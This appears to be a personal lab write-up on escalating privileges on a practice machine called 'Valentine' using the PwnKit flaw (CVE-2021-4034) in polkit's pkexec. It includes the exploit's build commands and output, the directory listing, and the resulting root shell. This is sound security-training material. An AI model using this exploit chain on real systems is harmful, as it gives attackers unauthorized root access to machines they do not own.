InfoSec LAB

Valentine_Privilege_Escalation

Created: 2 min read

CVE-2021-4034(PwnKit):

PEAS discovered that the targe system is vulnerable to CVE-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

i found an exploit online

hype@valentine:/tmp/CVE-2021-4034$ make 
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.
 
hype@valentine:/tmp/CVE-2021-4034$ ll
total 72
drwxr-xr-x 5 hype hype 4096 oct  8 11:57 ./
drwxrwxrwt 7 root root 4096 oct  8 11:58 ../
-rwxrwxr-x 1 hype hype 8387 oct  8 11:57 cve-2021-4034*
-rw-r--r-- 1 hype hype  292 oct  8 11:55 cve-2021-4034.c
-rwxr-xr-x 1 hype hype  305 oct  8 11:55 cve-2021-4034.sh*
drwxr-xr-x 2 hype hype 4096 oct  8 11:55 dry-run/
-rw-rw-r-- 1 hype hype   33 oct  8 11:57 gconv-modules
drwxrwxr-x 2 hype hype 4096 oct  8 11:57 GCONV_PATH=./
drwxr-xr-x 8 hype hype 4096 oct  8 11:55 .git/
-rw-r--r-- 1 hype hype  114 oct  8 11:55 .gitignore
-rw-r--r-- 1 hype hype 1071 oct  8 11:55 LICENSE
-rw-r--r-- 1 hype hype  469 oct  8 11:55 Makefile
-rw-r--r-- 1 hype hype  339 oct  8 11:55 pwnkit.c
-rwxrwxr-x 1 hype hype 8061 oct  8 11:57 pwnkit.so*
-rw-r--r-- 1 hype hype 3419 oct  8 11:55 README.md

I already transferred the exploit package to the target system over TCP via Netcat I then compiled the exploit. It created a binary; cve-2021-4034

hype@valentine:/tmp/CVE-2021-4034$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),124(sambashare),1000(hype)
# whoami
root
# hostname 
Valentine
# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b4:d5  
          inet addr:10.10.10.79  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::75ff:5e08:88d0:c60d/64 Scope:Global
          inet6 addr: dead:beef::250:56ff:feb9:b4d5/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b4d5/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:237285 errors:0 dropped:322 overruns:0 frame:0
          tx packets:217362 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:38716739 (38.7 MB)  TX bytes:79324304 (79.3 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:16436  Metric:1
          rx packets:11686 errors:0 dropped:0 overruns:0 frame:0
          tx packets:11686 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:2617233 (2.6 MB)  TX bytes:2617233 (2.6 MB)

System Level Compromise

Interactive Graph View

Backlinks